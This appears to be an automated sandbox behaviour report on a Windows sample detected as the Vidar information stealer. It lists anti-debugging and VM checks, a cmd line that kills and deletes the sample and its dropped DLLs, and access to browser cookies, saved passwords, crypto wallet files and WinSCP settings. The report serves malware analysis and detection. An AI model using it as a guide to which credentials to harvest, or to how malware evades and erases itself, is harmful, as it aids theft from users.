Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll	Jump to dropped file

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_0044FF30 GetSystemInfo,

0_2_0044FF30

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00406060 _memset,_memset,_memset,_memset,lstrcpyW,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,lstrcpyW,lstrcatW,_memset,_memset,_memset,_memset,FindClose,FindClose,_memset,_memset,_memset,_memset,	0_2_00406060
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00497C30 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_00497C30
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00406C00 _sprintf,FindFirstFileA,_sprintf,CopyFileA,FindNextFileA,FindClose,	0_2_00406C00
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_03437E80 FindFirstFileW,FindNextFileW,FindNextFileW,	0_2_03437E80

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Source: MSQNZmmg2F.exe, 00000000.00000003.291021748.0000000004A40000.00000004.00000001.sdmp, VKOTTYY7FG6Q1H0K.exe, 0000000F.00000000.320072467.0000000000972000.00000002.00020000.sdmp, VKOTTYY7FG6Q1H0K.exe.0.dr	Binary or memory string: IHGFSD
Source: MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWen-USnXj
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWP
Source: MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:NTG
Source: MSQNZmmg2F.exe, 00000000.00000003.291021748.0000000004A40000.00000004.00000001.sdmp, VKOTTYY7FG6Q1H0K.exe, 0000000F.00000000.320072467.0000000000972000.00000002.00020000.sdmp, VKOTTYY7FG6Q1H0K.exe.0.dr	Binary or memory string: qemU8

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_0049D2E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0049D2E0

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

0_2_004B1489

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_004B2FC7 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_004B2FC7

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_033A092B mov eax, dword ptr fs:[00000030h]		0_2_033A092B
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_033A0D90 mov eax, dword ptr fs:[00000030h]		0_2_033A0D90

Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_0049D2E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0049D2E0
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004A47A7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004A47A7
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_034449F7 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_034449F7
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_0343D530 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0343D530

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im MSQNZmmg2F.exe /f

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe 'C:\ProgramData\VKOTTYY7FG6Q1H0K.exe'	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im MSQNZmmg2F.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\MSQNZmmg2F.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im MSQNZmmg2F.exe /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\CC\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Cookies\Edge_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Cookies\IE_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Downloads\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Files\Default.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\History\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Queries volume information: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\screenshot.jpg VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\VKOTTYY7FG6Q1H0K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_004AE00C
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_004AC83B
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_004AE0B3
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_004AE10E
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_004ADA30
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_004AE2DF
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_004ACAE6
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_004AE39F
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_004AE442
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_004AE406
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: GetLocaleInfoA,	0_2_0049F422
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_004A1D2A
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_004B2D29
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_004B2E03
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_004AD742
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_004ADF17
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_0344E303
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_0344E25C
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,GetLocaleInfoW,	0_2_0344CA8B
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0344E167
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_0344D992
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_03453053
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_03441F7A
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0344E656
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itow_s,	0_2_0344E692
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_0344E52F
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0344CD36
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0344E5EF

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_0049A160 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0049A160

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_004A7312 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_004A7312

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_004930A0 GetUserNameA,

0_2_004930A0

Stealing of Sensitive Information:

Yara detected Vidar

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.33a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MSQNZmmg2F.exe.33a0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MSQNZmmg2F.exe.3480000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.MSQNZmmg2F.exe.3480000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.247390446.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSQNZmmg2F.exe PID: 1404, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????????	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????????	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????????	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????????	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\??	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????????	Jump to behavior
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????????	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: ElectrumLTC
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: ElectronCash
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: \Electrum\wallets\
Source: MSQNZmmg2F.exe	String found in binary or memory: JaxxLiberty
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: window-state.json
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: exodus.conf.json
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: info.seco
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: ElectrumLTC
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: passphrase.json
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: Exodus
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: default_wallet
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: \Ethereum\
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: file__0.localstorage
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: MultiDoge
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: seed.seco
